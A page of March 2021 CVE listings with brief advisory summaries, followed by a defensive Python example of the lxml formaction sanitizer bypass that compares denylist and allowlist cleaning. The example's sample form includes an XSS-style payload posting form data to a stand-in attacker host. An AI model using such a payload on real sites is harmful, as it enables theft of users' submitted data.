CVE List - 2021 / March
Showing 901 - 1000 of 1447 CVEs for March 2021 (Page 10 of 15)
| CVE ID | Date | Title |
|---|---|---|
| CVE-2019-10225 | 2021-03-19 | A flaw was found in atomic-openshift of openshift-4.2 where the basic-user RBAC role in OpenShift Container Platform doesn't sufficiently protect the GlusterFS StorageClass against leaking of the restuserkey. An attacker... |
| CVE-2019-14828 | 2021-03-19 | A vulnerability was found in Moodle affecting 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where users with the capability to create courses were assigned... |
| CVE-2019-14829 | 2021-03-19 | A vulnerability was found in Moodle affecting 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions where activity creation capabilities were not correctly respected when selecting... |
| CVE-2019-14830 | 2021-03-19 | A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where the mobile launch endpoint contained an open redirect in some... |
| CVE-2019-14831 | 2021-03-19 | A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where forum subscribe link contained an open redirect if forced subscription... |
| CVE-2021-21267 | 2021-03-19 | Regular Expression Denial-of-Service in npm schema-inspector |
| CVE-2019-10200 | 2021-03-19 | A flaw was discovered in OpenShift Container Platform 4 where, by default, users with access to create pods also have the ability to schedule workloads on master nodes. Pods with... |
| CVE-2021-28117 | 2021-03-20 | libdiscover/backends/KNSBackend/KNSResource.cpp in KDE Discover before 5.21.3 automatically creates links to potentially dangerous URLs (that are neither https:// nor http://) based on the content of the store.kde.org web site. (5.18.7 is... |
| CVE-2021-28951 | 2021-03-20 | An issue was discovered in fs/io_uring.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (deadlock) because exit may be waiting to park a... |
| CVE-2021-28950 | 2021-03-20 | An issue was discovered in fs/fuse/fuse_i.h in the Linux kernel before 5.11.8. A "stall on CPU" can occur because a retry loop continually finds the same bad inode, aka CID-775c5033a0d1. |
| CVE-2021-28952 | 2021-03-20 | An issue was discovered in the Linux kernel through 5.11.8. The sound/soc/qcom/sdm845.c soundwire device driver has a buffer overflow when an unexpected port ID number is encountered, aka CID-1c668e1c0a0f. (This... |
| CVE-2020-27170 | 2021-03-20 | An issue was discovered in the Linux kernel before 5.11.8. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information... |
| CVE-2020-27171 | 2021-03-20 | An issue was discovered in the Linux kernel before 5.11.8. kernel/bpf/verifier.c has an off-by-one error (with a resultant integer underflow) affecting out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks... |
| CVE-2021-28954 | 2021-03-21 | In Chris Walz bit before 1.0.5 on Windows, attackers can run arbitrary code via a .exe file in a crafted repository. |
| CVE-2021-28953 | 2021-03-21 | The unofficial C/C++ Advanced Lint extension before 1.9.0 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted repository. |
| CVE-2021-28957 | 2021-03-21 | An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formaction attribute allowing for... |
| CVE-2021-28961 | 2021-03-21 | applications/luci-app-ddns/luasrc/model/cbi/ddns/detail.lua in the DDNS package for OpenWrt 19.07 allows remote authenticated users to inject arbitrary commands via POST requests. |
| CVE-2021-23360 | 2021-03-21 | Arbitrary Command Injection |
| CVE-2020-13963 | 2021-03-21 | SOPlanning before 1.47 has Incorrect Access Control because certain secret key information, and the related authentication algorithm, is public. The key for admin is hardcoded in the installation code, and... |
| CVE-2021-26070 | 2021-03-22 | Affected versions of Atlassian Jira Server and Data Center allow remote attackers to evade behind-the-firewall protection of app-linked resources via a Broken Authentication vulnerability in the `makeRequest` gadget resource. The... |
| CVE-2021-26069 | 2021-03-22 | Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to download temporary files and enumerate project keys via an Information Disclosure vulnerability in the /rest/api/1.0/issues/{id}/ActionsAndOperations API... |
| CVE-2021-28956 | 2021-03-22 | The unofficial vscode-sass-lint (aka Sass Lint) extension through 1.0.7 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted workspace. NOTE: This vulnerability only... |
| CVE-2021-28955 | 2021-03-22 | git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows). |
| CVE-2021-28963 | 2021-03-22 | Shibboleth Service Provider before 3.2.1 allows content injection because template generation uses attacker-controlled parameters. |
| CVE-2021-28964 | 2021-03-22 | A race condition was discovered in get_old_root in fs/btrfs/ctree.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (BUG) because of a lack of... |
| CVE-2021-21437 | 2021-03-22 | Config Items are shown to users without permission |
| CVE-2021-21438 | 2021-03-22 | FAQ articles are shown to users without permission |
| CVE-2021-26295 | 2021-03-22 | RCE vulnerability in latest Apache OFBiz due to Java serialisation using RMI |
| CVE-2020-28501 | 2021-03-22 | Regular Expression Denial of Service (ReDoS) |
| CVE-2021-27962 | 2021-03-22 | Grafana Enterprise 7.2.x and 7.3.x before 7.3.10 and 7.4.x before 7.4.5 allows a dashboard editor to bypass a permission check concerning a data source they should not be able to... |
| CVE-2021-28146 | 2021-03-22 | The team sync HTTP API in Grafana Enterprise 7.4.x before 7.4.5 has an Incorrect Access Control issue. On Grafana instances using an external authentication service, this vulnerability allows any authenticated... |
| CVE-2021-28147 | 2021-03-22 | The team sync HTTP API in Grafana Enterprise 6.x before 6.7.6, 7.x before 7.3.10, and 7.4.x before 7.4.5 has an Incorrect Access Control issue. On Grafana instances using an external... |
| CVE-2021-28148 | 2021-03-22 | One of the usage insights HTTP API endpoints in Grafana Enterprise 6.x before 6.7.6, 7.x before 7.3.10, and 7.4.x before 7.4.5 is accessible without any authentication. This allows any unauthenticated... |
| CVE-2021-27308 | 2021-03-22 | A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. |
| CVE-2021-28968 | 2021-03-22 | An issue was discovered in PunBB before 1.4.6. An XSS vulnerability in the [email] BBcode tag allows (with authentication) injecting arbitrary JavaScript into any forum message. |
| CVE-2021-28972 | 2021-03-22 | In drivers/pci/hotplug/rpadlpar_sysfs.c in the Linux kernel through 5.11.8, the RPA PCI Hotplug driver has a user-tolerable buffer overflow when writing a new device name to the driver from userspace, allowing... |
| CVE-2021-28971 | 2021-03-22 | In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a... |
| CVE-2021-27593 | 2021-03-22 | When a user opens manipulated Graphics Interchange Format (.GIF) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user... |
| CVE-2021-27595 | 2021-03-22 | When a user opens manipulated Portable Document Format (.PDF) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user... |
| CVE-2021-27596 | 2021-03-22 | When a user opens manipulated Autodesk 3D Studio for MS-DOS (.3DS) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to... |
| CVE-2021-27594 | 2021-03-22 | When a user opens manipulated Windows Bitmap (.BMP) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user until... |
| CVE-2020-4882 | 2021-03-22 | IBM Planning Analytics 2.0 could be vulnerable to a Server-Side Request Forgery (SSRF) attack by constructing URLs from user-controlled data. This could enable attackers to make arbitrary requests to... |
| CVE-2021-26578 | 2021-03-22 | A potential security vulnerability has been identified in HPE Network Orchestrator (NetO) versions prior to 2.5. The vulnerability could be remotely exploited with SQL injection. |
| CVE-2021-25265 | 2021-03-22 | A malicious website could execute code remotely in Sophos Connect Client before version 2.1. |
| CVE-2020-9212 | 2021-03-22 | There is a vulnerability in some versions of USG9500 where the device improperly handles the information when a user logs in to the device. The attacker can exploit the vulnerability to... |
| CVE-2020-9206 | 2021-03-22 | The eUDC660 product has a resource management vulnerability. An attacker with high privilege needs to perform specific operations to exploit the vulnerability on the affected device. Due to improper resource... |
| CVE-2020-9213 | 2021-03-22 | There is a denial of service vulnerability in some Huawei products. In specific scenarios, due to the improper handling of the packets, an attacker may craft many specific packets. Successful... |
| CVE-2021-22309 | 2021-03-22 | There is an insecure algorithm vulnerability in Huawei products. A module uses insufficiently random input in a secure mechanism. Attackers can exploit this vulnerability by brute forcing to obtain sensitive message.... |
| CVE-2021-22310 | 2021-03-22 | There is an information leakage vulnerability in some Huawei products. Due to the improper storage of specific information in the log file, the attacker can obtain the information when a... |
| CVE-2021-22320 | 2021-03-22 | There is a denial of service vulnerability in Huawei products. A module cannot deal with specific messages correctly. Attackers can exploit this vulnerability by sending malicious messages to an affected... |
| CVE-2021-22311 | 2021-03-22 | There is an improper permission assignment vulnerability in Huawei ManageOne product. Due to improper security hardening, the process can run with a higher privilege. Successful exploit could allow certain users... |
| CVE-2021-22321 | 2021-03-22 | There is a use-after-free vulnerability in a Huawei product. A module cannot deal with specific operations in special scenarios. Attackers can exploit this vulnerability by performing malicious operations. This can... |
| CVE-2021-22314 | 2021-03-22 | There is a local privilege escalation vulnerability in some versions of ManageOne. A local authenticated attacker could perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker... |
| CVE-2021-25919 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly. A highly privileged attacker could inject arbitrary code into input... |
| CVE-2021-25921 | 2021-03-22 | In OpenEMR, versions 2.7.3-rc1 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly in the `Allergies` section. An attacker could lure an admin... |
| CVE-2021-25920 | 2021-03-22 | In OpenEMR, versions v2.7.2-rc1 to 6.0.0 are vulnerable to Improper Access Control when creating a new user, which leads to a malicious user being able to read and send sensitive messages... |
| CVE-2021-25918 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly and rendered in the TOTP Authentication method page. A highly... |
| CVE-2021-25917 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly and rendered in the U2F USB Device authentication method page.... |
| CVE-2021-25922 | 2021-03-22 | In OpenEMR, versions 4.2.0 to 6.0.0 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly. An attacker could trick a user to click on a... |
| CVE-2021-21347 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21346 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21345 | 2021-03-22 | XStream is vulnerable to a Remote Command Execution attack |
| CVE-2021-21344 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21343 | 2021-03-22 | XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights |
| CVE-2021-21342 | 2021-03-22 | A Server-Side Request Forgery (SSRF) can be triggered when unmarshalling with XStream, to access data streams from an arbitrary URL referencing a resource in an intranet or on the local host |
| CVE-2021-21341 | 2021-03-22 | XStream can cause a Denial of Service |
| CVE-2021-21351 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21350 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21349 | 2021-03-22 | A Server-Side Request Forgery (SSRF) can be triggered when unmarshalling with XStream, to access data streams from an arbitrary URL referencing a resource in an intranet or on the local host |
| CVE-2021-21348 | 2021-03-22 | XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDoS) |
| CVE-2021-20227 | 2021-03-23 | A flaw was found in SQLite's SELECT query functionality (src/select.c). This flaw allows an attacker who is capable of running SQL queries locally on the SQLite database to cause a... |
| CVE-2021-21338 | 2021-03-23 | Open Redirection in Login Handling |
| CVE-2021-21358 | 2021-03-23 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in typo3/cms-form |
| CVE-2021-21357 | 2021-03-23 | Broken Access Control in Form Framework |
| CVE-2021-21355 | 2021-03-23 | Unrestricted File Upload in Form Framework |
| CVE-2021-21340 | 2021-03-23 | Cross-Site Scripting in Content Preview |
| CVE-2021-21339 | 2021-03-23 | Cleartext storage of session identifier |
| CVE-2021-21370 | 2021-03-23 | Cross-Site Scripting in Content Preview (CType menu) |
| CVE-2021-21359 | 2021-03-23 | Denial of Service in Page Error Handling |
| CVE-2021-29068 | 2021-03-23 | Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects R6700v3 before 1.0.4.98, R6400v2 before 1.0.4.98, R7000 before 1.0.11.106, R6900P before 1.3.2.124, R7000P before 1.3.2.124,... |
| CVE-2021-29082 | 2021-03-23 | Certain NETGEAR devices are affected by disclosure of sensitive information. This affects RBW30 before 2.6.1.4, RBS40V before 2.6.1.4, RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBK754 before 3.2.15.25,... |
| CVE-2021-29081 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before... |
| CVE-2021-29080 | 2021-03-23 | Certain NETGEAR devices are affected by password reset by an unauthenticated attacker. This affects RBK852 before 3.2.10.11, RBK853 before 3.2.10.11, RBR854 before 3.2.10.11, RBR850 before 3.2.10.11, RBS850 before 3.2.10.11, CBR40... |
| CVE-2021-29079 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29078 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before 3.2.17.12, RBK752... |
| CVE-2021-29077 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBW30 before 2.6.2.2, RBS40V before 2.6.2.4, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850... |
| CVE-2021-29076 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29075 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK852 before 3.2.17.12, RBK852 before 3.2.17.12, RBR850 before... |
| CVE-2021-29074 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before... |
| CVE-2021-29073 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects R8000P before 1.4.1.66, MK62 before 1.0.6.110, MR60 before 1.0.6.110, MS60 before 1.0.6.110, R7960P before... |
| CVE-2021-29072 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29071 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before 3.2.17.12, RBR752... |
| CVE-2021-29070 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29069 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects XR450 before 2.3.2.114, XR500 before 2.3.2.114, and WNR2000v5 before 1.0.0.76. |
| CVE-2021-29067 | 2021-03-23 | Certain NETGEAR devices are affected by authentication bypass. This affects RBW30 before 2.6.2.2, RBS40V before 2.6.2.4, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before... |
| CVE-2021-29066 | 2021-03-23 | Certain NETGEAR devices are affected by authentication bypass. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29065 | 2021-03-23 | NETGEAR RBR850 devices before 3.2.10.11 are affected by authentication bypass. |
| CVE-2020-28503 | 2021-03-23 | Prototype Pollution |
| CVE-2021-27529 | 2021-03-23 | A cross-site scripting (XSS) vulnerability in DynPG version 4.9.2 allows remote attackers to inject JavaScript via the "limit" parameter. |
| CVE-2021-27531 | 2021-03-23 | A cross-site scripting (XSS) vulnerability in DynPG version 4.9.2 allows remote attackers to inject JavaScript via the "query" parameter. |
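The python-lxml entry in the table (CVE-2021-28957) describes the usual shape of an HTML sanitizer bypass: the cleaner falls back to a denylist of dangerous attributes once the attribute allowlist is switched off, the denylist forgets `formaction`, and a submit button can then redirect a form's POST (and the data in it) to a URL the attacker chooses. The block below is an added example written for this page; it is not code from lxml, from the CVE, or from any project listed above, and it uses only the Python standard library. It shows an attribute scrubber written both ways, as a denylist and as an allowlist, plus an audit pass that can be run over any sanitizer's output to list the URL- and script-bearing attributes that survived. The allowlist policy, the `attacker.example` host and the sample form are constructed for the demo.

```python
from html import escape
from html.parser import HTMLParser

# Attributes whose value is a URL the browser may navigate to or fetch.
# formaction on <button>/<input> overrides the enclosing <form action>.
URL_ATTRS = {"href", "src", "action", "formaction", "poster", "data",
             "background", "srcset", "xlink:href"}

# Constructed allowlist policy for the demo: tag -> attributes that may
# survive. Tags not listed keep no attributes at all.
ALLOWED = {
    "a": {"href", "title"},
    "img": {"src", "alt"},
    "form": {"action", "method"},
    "input": {"type", "name", "value"},
    "button": {"type", "name", "value"},
}


class _Rewriter(HTMLParser):
    """Re-serialises markup, keeping only attributes that `keep` accepts.
    A minimal serialiser for the demo, not a full HTML5 one."""

    def __init__(self, keep):
        super().__init__(convert_charrefs=True)
        self.keep = keep          # keep(tag, attr_name, attr_value) -> bool
        self.out = []

    def _emit_tag(self, tag, attrs, self_closing):
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases names
            if self.keep(tag, name, value):
                rendered = "" if value is None else f'="{escape(value, quote=True)}"'
                kept.append(f" {name}{rendered}")
        self.out.append(f"<{tag}{''.join(kept)}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def clean(html, keep):
    parser = _Rewriter(keep)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def denylist_clean(html):
    """Denylist policy: strip on* handlers and javascript: URLs, keep the rest.
    It never mentions formaction, so that attribute survives (the
    CVE-2021-28957 pattern)."""
    def keep(tag, name, value):
        is_handler = name.startswith("on")
        is_js_url = (value or "").strip().lower().startswith("javascript:")
        return not is_handler and not is_js_url
    return clean(html, keep)


def allowlist_clean(html, allowed=ALLOWED):
    """Allowlist policy: an attribute survives only if the policy names it
    for that tag. formaction is not in the policy, so it is dropped."""
    return clean(html, lambda tag, name, value: name in allowed.get(tag, ()))


class _Audit(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS or name.startswith("on"):
                self.findings.append((tag, name, value or ""))

    handle_startendtag = handle_starttag


def audit(html):
    """Return (tag, attr, value) for every URL- or script-bearing attribute
    still present; run it over any sanitizer's output as a second gate."""
    parser = _Audit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a comment form whose submit button silently redirects
# the POST, and the form data in it, to an attacker-controlled host.
SAMPLE = ('<form action="/comment" method="post">'
          '<input type="text" name="body" value="hi">'
          '<button type="submit" formaction="https://attacker.example/steal" '
          'onclick="alert(1)">Send</button></form>')

if __name__ == "__main__":
    for label, scrub in (("denylist", denylist_clean), ("allowlist", allowlist_clean)):
        out = scrub(SAMPLE)
        print(f"{label}: {out}\n  surviving: {audit(out)}")
```

Run as a script, the denylist output still carries `formaction` (with `onclick` gone, so the handler check alone looks like it worked), while the allowlist output drops it; the audit over the allowlist output lists only the legitimate `form action`. The practical point matches the CVE text: leave the cleaner's attribute allowlist (`safe_attrs_only`) enabled, and treat any sanitized output in which `audit()` still reports `formaction` as a sanitizer failure rather than something to patch with one more denylist entry.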